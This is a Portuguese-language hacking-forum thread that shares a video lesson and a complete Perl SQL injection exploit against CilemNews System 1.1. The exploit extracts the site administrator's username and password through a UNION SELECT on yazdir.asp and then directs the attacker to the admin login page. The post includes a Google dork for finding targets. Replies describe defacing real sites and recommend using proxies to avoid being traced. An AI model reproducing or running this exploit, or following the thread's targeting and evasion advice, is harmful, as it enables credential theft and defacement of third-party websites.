FORUM DARKERS

Baixe o video Clicando Aqui (//http://rapidshare.de/files/15688090/CilemNews_System.rar.html)

Agora postarei o codigo do exploit utilizado, caso use windows tenha o active perl que pode ser encontrado no www.superdownloads.com.br (http://www.superdownloads.com.br)
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: cilem.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=10
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
use IO::Socket;
if(@ARGV < 2){
print "
+***********************************************************************+
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
+                   Usage: cilem.pl <victim> <directory>                +
+                       Example: cilem.pl sux.com /                     +
+                 googledork [ inurl:yazdir.asp?haber_id= ]             +
+                 Method found & Exploit scripted by nukedx             +
+***********************************************************************+
";
exit();
}
#Local variables
$cilemserver = $ARGV[0];
$cilemserver =~ s/(http:\/\/)//eg;
$cilemhost = "http://".$cilemserver;
$port = "80";
$cilemdir = $ARGV[1];
$cilemtar = "yazdir.asp?haber_id=";
$cilemfinal = "admin/giris.asp";
$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $cilemserver\n";
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $cilem "GET $cilemreq\n";
print $cilem "Host: $cilemserver\n";
print $cilem "Accept: */*\n";
print $cilem "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$cilem>) {
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
print "+ Exploit succeed! Getting admin's information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /(.*?)<\/font><\/td>/) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
Autor do Video: h4xOr

100 +

Estou baixando o arquivo de de 13,3 MB para quem tem net discada vai demorar em torno de 45 minutos.

Pela descrição deve ser uma boa video aula, baixem enquanto e tempo antes que o Rapidshare apague o arquivo.

Ótima aula
Mto boua msm
vlw ae cara
abraçao!

Vou conferir o video,e,parabens pela iniciativa de contribuir com conhecimento e
compartilha-lo!

Hmm...

Nao consegui fazer nao xD...

Nao axei nenhum site que desse certo...

Mas msm assim vlw pela postagem..

Vou dar uma olhada no video e estudar esse exploit!

//Emily

muito bom =D fiz em 1 site so q fizeram por cima do meu -.-'

pqp man vc sabe da vul e nao conserta no seu?

ae

amanha sem falta vou da uma olhada nessa parada de deface

parece ser muito maneiro ^^

vlw pelo post amigo

Uppa de novo ae velho...ta dando erro aki.

Qual o erro ?

Quote from: "SnOOp"Uppa de novo ae velho...ta dando erro aki.

100+

Ah esse eu não perco,valeu!

Muito Interessante
So Gostaria de Saber se o cara usou algum tipo de proxy
Porque logar como root fica logado naum?
Se eu estiver errado me corrigam
Sem mais
Muito Maneiro Mesmo
Vlw Irmão!

Não entendi sua pergunta 

Quer saber se foi utilizado algum proxy ?

Quote from: "Rhavynho Player"Muito Interessante
So Gostaria de Saber se o cara usou algum tipo de proxy
Porque logar como root fica logado naum?
Se eu estiver errado me corrigam
Sem mais
Muito Maneiro Mesmo
Vlw Irmão!

100+

Ué não aparece os segundos pra baixar.   

Estranho, aqui aparece os segundos normal.

Quote from: "SnOOp"Ué não aparece os segundos pra baixar.   

100+

Consegui...
Agora outra pergunta, com qual player que eu abro esse tipo de extensão. Me passem um link de um ae que tenha como abrir por favor.

Não veio nenhum arquivo em .html

Pois no linux o .swf so clicar que abre normalmente, mais vem também um arquivo .html que so clicar e ve como se fosse uma pagina de web.

100+

Tipo
Na aula o cara loga com admin no site de noticias e faz deface
So que logar com admin fica registrado e isso pode levar a descobrir que foi ele
No caso, é necessario usar algum proxy ou alguma ferramenta que sconda o ip?
So isso
Vlw!

legalzinho

OooH
meu video ja ta ate aki!!!!!
CooOOL
vlw Dc!


ett 4ever!

Quote from: "Rhavynho Player"Tipo
Na aula o cara loga com admin no site de noticias e faz deface
So que logar com admin fica registrado e isso pode levar a descobrir que foi ele
No caso, é necessario usar algum proxy ou alguma ferramenta que sconda o ip?
So isso
Vlw!

Sim né..
axo q isso é lei pra qlqer hacker....
usar proxy!

Ótima video aula,  mas creio que essa falha nao esteja mais "ON" pois procurei no google, e tentei em todos os sites por inurl:yazdir.asp?haber_id= e nenhum estava vul...

Mas muito boa a video aula, thanks